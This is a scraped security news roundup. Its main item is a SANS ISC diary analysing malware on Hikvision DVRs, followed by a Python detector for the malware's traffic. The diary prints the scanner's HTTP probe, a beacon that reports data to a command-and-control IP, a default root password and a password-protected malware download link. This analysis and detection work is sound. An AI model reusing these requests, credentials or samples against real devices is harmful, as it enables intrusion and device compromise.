Hackin9

Facebook flashes its One Tool To Rule Them All in security threat analysis
Register
The social network's engineers said the utility, imaginatively dubbed ThreatData, collects software nasties shared by researchers and also throws in intelligence gathered by Facebook plus information it buys from infosec firms. Unfortunately, these ...

 

SANS Institute to Hold Security Leadership Summit in Boston
SYS-CON Media (press release)
SANS offers a myriad of free resources to the InfoSec community including consensus projects, research reports, and newsletters; it also operates the Internet's early warning system—the Internet Storm Center. At the heart of SANS are the many security ...

 
 
Bing is poised to function like a souped-up Yellow Pages, with visual search results offering more information about professionals such as lawyers and doctors.
 
It's been nearly four years since SAP got into enterprise mobility with the acquisition of Sybase, but many customers still don't quite understand its mobile product strategy, according to a new survey by the Americas' SAP Users' Group.
 
Reports are circulating that Yahoo is looking to launch a video site that would go up against Google's behemoth YouTube.
 
A federal jury in New Jersey has handed a setback to Avaya, ruling that it illegally tried to quash competition for service on its enterprise communications equipment.
 
Intel's US$740 million investment in software company Cloudera will help sell more x86 chips in Hadoop installations, but it could also be a defensive move to maintain its server lead from the emerging threat posed by 64-bit ARM servers.
 
U.S. regulators are opening up spectrum that could allow for Wi-Fi services with speeds of one gigabit per second and faster.
 
Oracle has overtaken rival IBM as the world's second-largest software vendor by pulling in $29.6 billion in software revenue during 2013, according to analyst firm Gartner.
 
The U.S. Supreme Court could wipe out a whole swath of software and business-method patents if justices invalidate four electronic-trading patents, an attorney for patent-owner Alice said.
 
The sun emitted what NASA is calling a "significant" solar flare on Saturday that could affect communications systems on Earth on Wednesday.
 
[SECURITY] [DSA 2891-2] mediawiki regression update
 
Facebook CEO Mark Zuckerberg faced a lot of criticism last week when his company agreed to pay $2 billion for a startup still building its first product, the Rift virtual reality headset.
 
The U.S. government's flagship health insurance exchange website, Healthcare.gov, was temporarily shut down Monday, the deadline for people to sign up for health coverage under the new law.
 
PhonerLite 2.14 SIP Soft Phone - SIP Digest Leak Information Disclosure (CVE-2014-2560)
 
cURL/libcURL CVE-2014-0138 Remote Security Bypass Vulnerability
 
LaCie announced it is releasing a 2TB version of its Fuel wireless hard drive.
 

Security provider RSA endowed its BSAFE cryptography toolkit with a second NSA-influenced random number generator (RNG) that's so weak it makes it easier for eavesdroppers to decrypt protected communications, Reuters reported Monday.

Citing soon-to-be-published research from several universities, Reuters said the Extended Random extension for secure websites allows attackers to work tens of thousands of times faster when breaking cryptography that uses the Dual EC_DRBG algorithm to generate the random numbers that populate a specific cryptographic key. Dual EC_DRBG is a pseudo-random number generator that was developed by cryptographers from the National Security Agency and was the default RNG in BSAFE even after researchers demonstrated weaknesses so severe that many suspected they were introduced intentionally so the US spy agency could exploit them to crack encrypted communications of people it wanted to monitor. In December, Reuters reported that the NSA paid RSA $10 million to give Dual EC_DRBG its favored position in BSAFE.

Extended Random was a second RNG that would presumably make cryptographic keys more robust by adding a second source of randomness. In theory, the additional RNG should increase the entropy used when constructing a new key. In reality, the algorithm made protected communications even easier for attackers to decrypt by reducing the time it takes to predict the random numbers generated by Dual EC_DRBG, which is short for Dual Elliptic Curve, Reuters reported Monday.


 
 
LinuxSecurity.com: Security Report Summary
 
 
LinuxSecurity.com: New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: New seamonkey packages are available for Slackware 14.0, 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New httpd packages are available for Slackware 14.0, 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New mozilla-firefox packages are available for Slackware 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New mozilla-thunderbird packages are available for Slackware 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New curl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues. [More Info...]
 
LinuxSecurity.com: New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
 
ManageEngine OpStor Cross Site Scripting And Privilege Escalation Vulnerabilities
 
SePortal 'sp_id' Parameter SQL Injection Vulnerability
 

Daily Maily (People and Computers)

The new InfoSec format is based on the wisdom of the crowds
Daily Maily (People and Computers)
Information security has occupied information-systems people since the day the computer was invented. In recent years, since the rise of "cyber", the field's standing has dimmed somewhat, and with it the standing of those who actually fill the role, the security managers (CISOs). Now we stand on the threshold of a new era, in which everyone understands that ...

 
Still building your in-house data analytics operation? External providers can supplement your capabilities -- fast.
 
Encryption is one of the best ways to prevent the type of terrible headaches that many high-profile companies have experienced with stolen data. Even if experienced hackers are able to penetrate a system, having the data encrypted can mean that nothing useful is taken.
 
Under CIO Victor Fetter's leadership at LPL Financial, the IT group has moved from 'working on projects' to delivering solutions that shape the business and the marketplace.
 
Today's executives can boast about their companies' tech prowess, but they also need to keep an eye on archrivals and new competitors, says Maryfran Johnson.
 
IDG Communications CEO Michael Friedenberg offers his take on the latest IDC predictions about retail customers, big data, supply chain and more
 
Don't look now, but your company is losing control. Your marketing brethren are already living with the challenge: Customers are now in the driver's seat.
 

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries: D72BNr, the bitcoin miner (according to the usage info based on strings), and mzkk8g, which looks like a simpler HTTP agent, maybe to download additional tools easily (similar to curl/wget, which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so. A number of additional suspect files were located in the /dev directory which we still need to recover and analyze from the test system. The compromise of the DVR likely happened via an exposed telnet port and a default root password (12345).

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
- It then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:
 
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
 
So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.
 
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
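The two requests listed in the diary above give a defender something concrete to match on. The following is an added detection example, not code from the ISC or from the malware: it parses raw HTTP request heads (constructed samples embedded below, with 192.0.2.10 standing in for a scanned NAS) and labels the Synology probe and the reporting beacon. Note that /webman/info.cgi alone is a weak signal, since legitimate DSM clients also call it, so the probe rule requires the full combination of path, MSIE 6.0 User-Agent and zero Content-Length from the diary.

```python
import re
from typing import Optional

# Indicators from the ISC diary above; the beacon's %lu is assumed to be a decimal number at runtime.
C2_HOST = "162.219.57.8"
PROBE_PATH = "/webman/info.cgi?host="
BEACON_PATH_RE = re.compile(r"^/k\.php\?h=\d+$")
BEACON_UA = "Ballsack"


def parse_request(raw: str) -> Optional[dict]:
    """Parse an HTTP/1.x request head into method, path and lower-cased header names."""
    lines = raw.strip().splitlines()
    if not lines:
        return None
    parts = lines[0].split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers}


def classify_request(raw: str) -> Optional[str]:
    """Return 'synology-probe', 'c2-beacon' or None for one captured request."""
    req = parse_request(raw)
    if req is None:
        return None
    h = req["headers"]
    host = h.get("host", "").split(":")[0]  # drop the :5000 port suffix
    ua = h.get("user-agent", "")
    # Scanner probe: exact combination seen in the diary, not the path alone.
    if (req["method"] == "GET" and req["path"].startswith(PROBE_PATH)
            and "MSIE 6.0" in ua and h.get("content-length") == "0"):
        return "synology-probe"
    # Reporting channel: any one of the three indicators is enough to flag.
    if host == C2_HOST or BEACON_PATH_RE.match(req["path"]) or ua == BEACON_UA:
        return "c2-beacon"
    return None


def scan_requests(raws) -> list:
    """Return (index, label) for every request in a batch that matches a rule."""
    return [(i, classify_request(r)) for i, r in enumerate(raws) if classify_request(r)]


# Constructed samples: the diary's probe and beacon, plus one benign DSM request.
SAMPLE_REQUESTS = [
    "GET /webman/info.cgi?host= HTTP/1.0\r\nHost: 192.0.2.10:5000\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n",
    "GET /k.php?h=123456 HTTP/1.0\r\nHost: 162.219.57.8\r\nUser-Agent: Ballsack\r\nConnection: close\r\n",
    "GET /webman/index.cgi HTTP/1.1\r\nHost: 192.0.2.10:5000\r\nUser-Agent: Mozilla/5.0\r\n",
]
```

Feeding reassembled request heads from a packet capture or reverse-proxy log into scan_requests gives a quick first pass over traffic to a port-5000 NAS; the beacon rule also works as an egress alert for the DVR side.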
 
For the next release of its open source MySQL, Oracle is making a number of changes designed to vastly boost the speed of the open source relational database management system.
 
LibYAML 'yaml_parser_scan_uri_escapes()' Function Remote Heap Based Buffer Overflow Vulnerability
 
Symantec LiveUpdate Administrator CVE-2014-1644 Unauthorized Access Vulnerability
 
Symantec LiveUpdate Administrator CVE-2014-1645 SQL Injection Vulnerability
 
Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities
 
Microsoft's new Word for iPad app has cracked the top 10 on Apple's App Store 'Top Grossing' chart.
 
Alibaba Group is investing about $692 million in retail company Intime Retail with the aim of setting up a joint venture that aims to provide linkages between their online and physical retail businesses in China.
 
Fitnesse CVE-2014-1216 Remote Code Execution Vulnerability
 
Siemens SIMATIC S7-1200 CVE-2014-2256 Denial of Service Vulnerability
 
PhotoWIFI Lite v1.0 iOS - Multiple Web Vulnerabilities
 
[SECURITY] [DSA 2891-1] mediawiki security update
 
[SECURITY] [DSA 2890-1] libspring-java security update
 
[slackware-security] seamonkey (SSA:2014-086-07)
 
Siemens SIMATIC S7-1200 CVE-2014-2254 Denial of Service Vulnerability
 
Siemens SIMATIC S7-1200 CVE-2014-2258 Denial of Service Vulnerability
 
Google said its free DNS (Domain Name System) service is being intercepted by most Turkish ISPs as the country battles users trying to circumvent censorship efforts by the government.
 
 
Technology that remotely makes a stolen smartphone useless could save American consumers up to $2.6 billion per year if it is implemented widely and leads to a reduction in theft of phones, according to a new report.
 
One of the two banks suing Target and security vendor Trustwave over responsibility for one the largest data breaches in history has pulled out of the lawsuit.
 
U.S. District Judge Lucy H. Koh on Sunday overruled Samsung Electronics' objections to showing jurors a recent instructional video on how patents work, ahead of a trial in a patent dispute between Apple and Samsung.
 
A group of activists are hoping to appeal a U.S. judge's ruling that treated the censorship on Chinese search engine Baidu as free speech.
 
The latest release of Fedora, nicknamed "Heisenbug," is a step towards making Fedora a player in the mobile arena. Fedora 20 also includes more support for cloud, and this is also the first release that supports cheap, low-power ARM processors as a primary architecture, in addition to Intel and AMD chips.
 
Rep. William Keating (D-Mass.), who sits on the House Cybersecurity, Infrastructure Protection and Security Technologies Subcommittee, is calling on the Department of Homeland Security to be more involved in tackling the cybersecurity problem.
 
Linux Kernel 'arch_dup_task_struct()' Function Local Denial of Service Vulnerability
 
Linux Kernel 'drivers/net/wireless/ath/ath9k/xmit.c' Local Denial of Service Vulnerability
 
[slackware-security] mozilla-thunderbird (SSA:2014-086-05)
 
[slackware-security] mozilla-nss (SSA:2014-086-04)
 
[slackware-security] mozilla-firefox (SSA:2014-086-03)
 

SiliconANGLE (blog)

McAfee CSO article stirs up the whitehat infosec community
SiliconANGLE (blog)
An article published by Security Magazine online by McAfee Chief Security Officer Brent Conran earlier this month has created a storm of controversy in the infosec community. Posted under the category 'Cyber Safety' and entitled 'Why ...

 
Spring Framework CVE-2014-0054 Multiple XML External Entity Injection Vulnerabilities
 
Spring Framework 'FormTag.java' Cross Site Scripting Vulnerability
 
Internet Storm Center Infocon Status